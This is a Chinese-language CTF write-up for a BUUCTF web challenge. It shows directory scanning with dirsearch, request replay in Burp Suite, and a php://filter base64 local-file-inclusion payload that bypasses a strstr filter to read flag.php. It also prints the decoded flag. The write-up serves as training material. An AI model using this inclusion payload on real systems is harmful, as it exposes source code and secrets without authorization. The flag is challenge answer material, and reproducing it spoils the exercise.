题目环境：

网页什么都没有，GET那里也没有任何参数和文件

F12查看隐藏文件

发现隐藏文件

点进去看看

发现一个可点击按钮

SECRET

好家伙，什么都没有

这里猜测还有隐藏文件

目录扫描

使用工具dirsearch

命令：

python dirsearch.py -u [http://a9c9b5bd-4430-4ffb-88bf-0eec1fa73296.node4.buuoj.cn:81/](http://a9c9b5bd-4430-4ffb-88bf-0eec1fa73296.node4.buuoj.cn:81/)

发现隐藏文件flag.php

补充一点，这里我用御剑没有扫描出来，不知道是什么问题，有知道的师傅还望解答，感谢！

访问flag.php

有内容但是flag没有显示出来，猜测flag是被编码了，需要用到PHP伪协议，但是不知道具体参数是什么，这里需要抓包

burpsuite抓包

使用火狐浏览器访问题目地址

点击SECRET进行抓包

右键后，Repeater进行重放

访问隐藏文件secr3t.php

strstr函数查询…/,tp,input,data在file变量里面是否存在，存在则输出0h no!

这对构造PHP伪协议毫无影响

使用参数file访问flag.php文件
回显结果更是表明了flag.php文件内容被编码了

构造PHP伪协议：

**php://filter/read=convert.base64-encode/resource=flag.php**最终payload：

**URL/?file=php://filter/read=convert.base64-encode/resource=flag.php**

回显结果：

可以看到是明显的base64编码格式

放到Kali进行base64解码

echo "PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZTI0OTJhMTktZDhjYi00OGYzLWIwOTctYjM0OGQyNjEwZmExfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=" | base64 -d

回显结果：

得出flag：

flag{e2492a19-d8cb-48f3-b097-b348d2610fa1}